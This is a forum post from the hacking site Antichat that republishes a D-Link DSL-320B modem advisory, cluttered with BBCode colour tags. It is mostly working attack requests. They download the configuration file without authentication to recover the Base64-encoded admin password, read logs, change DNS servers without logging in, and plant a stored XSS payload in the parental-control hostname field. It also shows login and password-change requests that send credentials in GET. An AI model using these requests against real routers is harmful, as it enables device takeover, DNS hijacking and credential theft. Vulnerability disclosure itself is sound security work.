Форум АНТИЧАТ - D-Link DSL-320B Authentication Bypass / Cross Site Scripting

D-Link DSL-320B Authentication Bypass / Cross Site Scripting

http://www.dlink.com/de/de/home-solutions/connect/modems-and-gateways/dsl-320b-adsl-2-ethernet-modem
PHP код:

		
			
[COLOR="#000000"][COLOR="#0000BB"]Access to the Config file without authentication[/COLOR][COLOR="#007700"]=>[/COLOR][COLOR="#0000BB"]full authentication bypass possible[/COLOR][COLOR="#007700"]! :): ([/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"])

[/COLOR][COLOR="#0000BB"]192.168.178.111[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]config[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]bin

[/COLOR][COLOR="#007700"]=======

=======

=>[/COLOR][COLOR="#0000BB"]sysPassword is Base64 encoded

[/COLOR][COLOR="#007700"]*[/COLOR][COLOR="#0000BB"]Access to the logfile without authentication[/COLOR][COLOR="#007700"]: ([/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"])

[/COLOR][COLOR="#0000BB"]192.168.178.111[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]status[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]status_log[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]sys

[/COLOR][COLOR="#007700"]*[/COLOR][COLOR="#0000BB"]Change the DNS Settings without authentication[/COLOR][COLOR="#007700"]: ([/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"])

[/COLOR][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//192.168.178.111/advanced/adv_dns.xgi?&SET/dns/mode=0&SET/dns/mode/server/primarydns=1.1.1.1&SET/dns/mode/server/secondarydns=2.2.2.2

[/COLOR][COLOR="#007700"]*[/COLOR][COLOR="#0000BB"]Stored XSS within parental control[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]2[/COLOR][COLOR="#007700"]):

    

    =>[/COLOR][COLOR="#0000BB"]Parameter[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]set[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]bwlist[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]entry[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]hostname

    

Request[/COLOR][COLOR="#007700"]:

[/COLOR][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//192.168.178.111/home/home_parent.xgi?&set/bwlist/enable=1&set/bwlist/bw_status=0&set/bwlist/entry:1/bw_flag=0&set/bwlist/entry:1/hostname=%22%3E%3Cimg%20src=%220%22%20onerror=alert(1)%3E&set/bwlist/entry:1/weekday=6&set/bwlist/entry:1/begintime=00:00&set/bwlist/entry:1/endtime=23:59&set/bwlist/entry:1/store=1&set/bwlist/apply=1

[/COLOR][COLOR="#0000BB"]Again you are able to place this XSS without authentication[/COLOR][COLOR="#007700"]. :)

*[/COLOR][COLOR="#0000BB"]Login Credentials in HTTP GET are not a good idea[/COLOR][COLOR="#007700"]=> use[/COLOR][COLOR="#0000BB"]HTTP Post[/COLOR][COLOR="#007700"]! ([/COLOR][COLOR="#0000BB"]3[/COLOR][COLOR="#007700"])

[/COLOR][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//192.168.178.111/login.xgi?user=admin&pass=admin1

[/COLOR][COLOR="#007700"]*[/COLOR][COLOR="#0000BB"]Credentials in HTTP GET via password change request are not a good idea[/COLOR][COLOR="#007700"]=> use[/COLOR][COLOR="#0000BB"]HTTP Post[/COLOR][COLOR="#007700"]!: ([/COLOR][COLOR="#0000BB"]3[/COLOR][COLOR="#007700"])

[/COLOR][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//192.168.178.111/tools/tools_admin.xgi?&set/sys/account/user/oldpwd=admin&set/sys/account/user/password=test&CMT=1[/COLOR][/COLOR]